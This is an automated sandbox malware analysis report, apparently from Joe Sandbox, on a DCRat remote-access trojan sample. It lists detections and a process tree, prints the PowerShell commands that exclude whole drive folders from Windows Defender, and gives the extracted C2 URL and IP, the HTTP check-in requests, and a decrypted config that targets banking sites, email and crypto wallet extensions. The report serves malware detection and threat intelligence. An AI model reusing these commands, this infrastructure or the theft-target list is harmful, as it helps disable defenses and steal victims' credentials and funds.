Windows Analysis Report
CPNSQusnwC.exe

Overview

General Information

Sample name: CPNSQusnwC.exe
renamed because original name is a hash value
Original sample name: A26ED7DC21BC77F20C0251FA25738D02.exe
Analysis ID: 1574710
MD5: a26ed7dc21bc77f20c0251fa25738d02
SHA1: 8fc82929941d67a20c76976e796feab701795c2f
SHA256: 18e83d9fabe142a751c644f12d223e6c4825912573a352551361abde977d753f
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CPNSQusnwC.exe (PID: 1416 cmdline: "C:\Users\user\Desktop\CPNSQusnwC.exe" MD5: A26ED7DC21BC77F20C0251FA25738D02)
    • powershell.exe (PID: 2820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4364 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4780 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1540 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4832 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1672 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3604 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7608 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7668 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • explorer.exe (PID: 8088 cmdline: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" MD5: A26ED7DC21BC77F20C0251FA25738D02)
        • powershell.exe (PID: 764 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3976 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7856 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7672 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5612 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7644 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7732 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6872 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
CPNSQusnwC.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\conhost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Recovery\conhost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: CPNSQusnwC.exe PID: 1416 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.CPNSQusnwC.exe.9d0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\CPNSQusnwC.exe, ProcessId: 1416, TargetFilename: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.88.91.89, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Initiated: true, ProcessId: 8088, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49753
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CPNSQusnwC.exe", ParentImage: C:\Users\user\Desktop\CPNSQusnwC.exe, ParentProcessId: 1416, ParentProcessName: CPNSQusnwC.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 2820, ProcessName: powershell.exe
                    Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe" , ProcessId: 8088, ProcessName: explorer.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-12-13T14:32:37.532082+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49753 | 45.88.91.89 | 80 | TCP

                    AV Detection

                    Source: CPNSQusnwC.exe, Avira: detected
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\conhost.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: C:\Recovery\conhost.exe, Avira: detection malicious, Label: HEUR/AGEN.1309961
                    Source: CPNSQusnwC.exe, Malware Configuration Extractor: DCRat {"C2 url": "http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, ReversingLabs: Detection: 76%
                    Source: C:\Recovery\conhost.exe, ReversingLabs: Detection: 76%
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, ReversingLabs: Detection: 76%
                    Source: C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, ReversingLabs: Detection: 76%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe, ReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\AxLDtRxd.log, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\DiqTAfIW.log, ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\ELylTcFa.log, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\FBkUkkGT.log, ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\FZhLDyOY.log, ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\FnPmnTXV.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\GWITZydS.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\HzZUtpuN.log, ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\QhesqMaw.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\SSKIxalp.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\TmvagkQx.log, ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\bvfQbQIf.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\eJSyBaRc.log, ReversingLabs: Detection: 15%
                    Source: C:\Users\user\Desktop\fJbhCUkS.log, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\gljzVSiX.log, ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\nTDOpObA.log, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\pxxplmMK.log, ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\qVqwKxgw.log, ReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\sUqvPban.log, ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\scaNtKAs.log, ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\ufMwPuFo.log, ReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\vEieQmso.log, ReversingLabs: Detection: 15%
                    Source: C:\Users\user\Desktop\wdeWzfMx.log, ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\zJHvHEBf.log, ReversingLabs: Detection: 25%
                    Source: CPNSQusnwC.exe, ReversingLabs: Detection: 76%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Joe Sandbox ML: detected
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Joe Sandbox ML: detected
                    Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Joe Sandbox ML: detected
                    Source: C:\Recovery\conhost.exe, Joe Sandbox ML: detected
                    Source: C:\Recovery\conhost.exe, Joe Sandbox ML: detected
                    Source: CPNSQusnwC.exe, Joe Sandbox ML: detected
                    Source: CPNSQusnwC.exeString decryptor: {"0":[],"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;payment;login;card;stripe;transfer;funds","_1":"1500","_2":"15","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;discord.com;outlook.com;roblox.com;coinbase.com;binance.com","_1":"mail.google.com;discord.com;outlook.com;roblox.com;coinbase.com;binance.com"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive","_1":""}}
                    Source: CPNSQusnwC.exeString decryptor: ["0627azsrrpmLzhaIO2sR04eNcJgAmrixoHoX1ShldxYimEoL7IzWu6l6bpeRSrF9Hzhr3CR6VGyDf6kYeVDd1MCrgr6LxQTvsYbxg7R412BoIiafEFw7olH5wzKLGFJE","5f4504307f363e68f0558d6ac524302b9a3972a38384428f8af4023ee520bec9","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVb3dZMjVXYkVscGQybFBRMGsyU1c1U2VXUlhWV2xNUTBrMVNXcHZhV1JJU2pGYVUwbHpTV3BGZDBscWIybGtTRW94V2xOSmMwbHFSWGhKYW05cFpFaEtNVnBUU1hOSmFrVjVTV3B2YVdSSVNqRmFVMGx6U1dwRmVrbHFiMmxrU0VveFdsTkpjMGxxUlRCSmFtOXBaRWhLTVZwVFNqa2lYUT09Il0="]
                    Source: CPNSQusnwC.exeString decryptor: [["http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/","linePacketprocessorauthSqlBasewindowsWordpressTemporary"]]
                    Source: CPNSQusnwC.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: CPNSQusnwC.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, Code function: 4x nop then jmp 00007FFD343DDFC6h (0_2_00007FFD343DDDAD)

                    Networking

                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49753 -> 45.88.91.89:80
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeNetwork Connect: 45.88.91.89 80
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 384Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continue
